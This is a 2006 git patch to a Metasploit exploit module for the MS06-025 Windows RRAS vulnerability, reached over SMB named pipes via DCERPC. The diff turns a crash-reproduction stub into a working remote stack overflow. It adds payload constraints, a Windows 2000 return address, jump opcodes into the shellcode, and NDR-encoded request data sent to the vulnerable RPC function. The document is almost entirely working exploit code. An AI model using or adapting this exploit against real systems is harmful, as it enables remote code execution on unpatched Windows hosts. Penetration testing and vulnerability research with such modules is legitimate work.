From 7a3bfce2b0a86afd025f7533afccf76c1237d9ba Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Wed, 14 Jun 2006 21:26:43 +0000
Subject: [PATCH] Straight port from anonymous

git-svn-id: file:///home/svn/incoming/trunk@3662 4d416f70-5f16-0410-b530-b9f4589650da
---
 modules/exploits/windows/smb/ms06_025_rras.rb | 47 +++++++++----------
 1 file changed, 23 insertions(+), 24 deletions(-)

diff --git a/modules/exploits/windows/smb/ms06_025_rras.rb b/modules/exploits/windows/smb/ms06_025_rras.rb
index 111d97b10e..540da34f74 100644
--- a/modules/exploits/windows/smb/ms06_025_rras.rb
+++ b/modules/exploits/windows/smb/ms06_025_rras.rb
@@ -31,12 +31,9 @@ class Exploits::Windows::Smb::MS06_025_RRAS < Msf::Exploit::Remote
 			'Privileged'     => true,
 			'Payload'        =>
 				{
-					'Space'    => 1000,
-					'BadChars' => "",
-					'Compat'   => 
-					{
-						# -ws2ord XXX?
-					},
+					'Space'    => 1104,
+					'BadChars' => "\x00",
+					'StackAdjustment' => -3500,
 				},
 			'Platform'       => 'win',
 			'Targets'        => 
@@ -44,7 +41,7 @@ class Exploits::Windows::Smb::MS06_025_RRAS < Msf::Exploit::Remote
 					[ 
 						'Windows 2000 TEST',
 						{
-							'Ret'      => 0x767a38f6, # umpnpmgr.dll
+							'Ret'      => 0x7571c1e4,
 						}
 					]														
 				],
@@ -64,39 +61,41 @@ class Exploits::Windows::Smb::MS06_025_RRAS < Msf::Exploit::Remote
 		connect()
 		smb_login()
 
-		handle = dcerpc_handle('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
+		handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
 		
 		print_status("Binding to #{handle} ...")
 		dcerpc_bind(handle)
 		print_status("Bound to #{handle} ...")
 
+		pat = 
+			payload.encoded +
+			"\xeb\x06" +
+			Rex::Text.rand_text_alphanumeric(2) +
+			[target.ret].pack('V') +
+			"\xe9\xb7\xfb\xff\xff"
+			
+		req = [1, 0x49].pack('VV') + pat + Rex::Text.rand_text_alphanumeric(0x4000-pat.length)
+		len = req.length
+		stb = 
+			NDR.long(0x20000) +
+			NDR.long(len) +
+			req           + 
+			NDR.long(len)
 
-		str = [1, 0x49].pack('VV') + Rex::Text.pattern_create(0x4000) + "\x00"
-
-		stubdata = 
-			# [1, ... and [2, ... result in different crashes...
-			[1, str.length, 0, str.length].pack('VVVV') + str + NDR.long(str.length) 
-
+		print_status("Calling the vulnerable function...")
+		
 		begin
-			dcerpc.call(0x0C, stubdata)
+			dcerpc.call(0x0C, stb)
 		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
-			print_good('server did not respond, this is expected')
 		rescue => e
-			if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
-				print_good('server disconnected, this is expected')
-			else
+			if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
 				raise e
 			end
-		else 
-			print_status('should be owned now...')
 		end
 
 		# Cleanup
 		handler
 		disconnect
-		
-		p dcerpc.last_response.stub_data
-
 	end
 
 end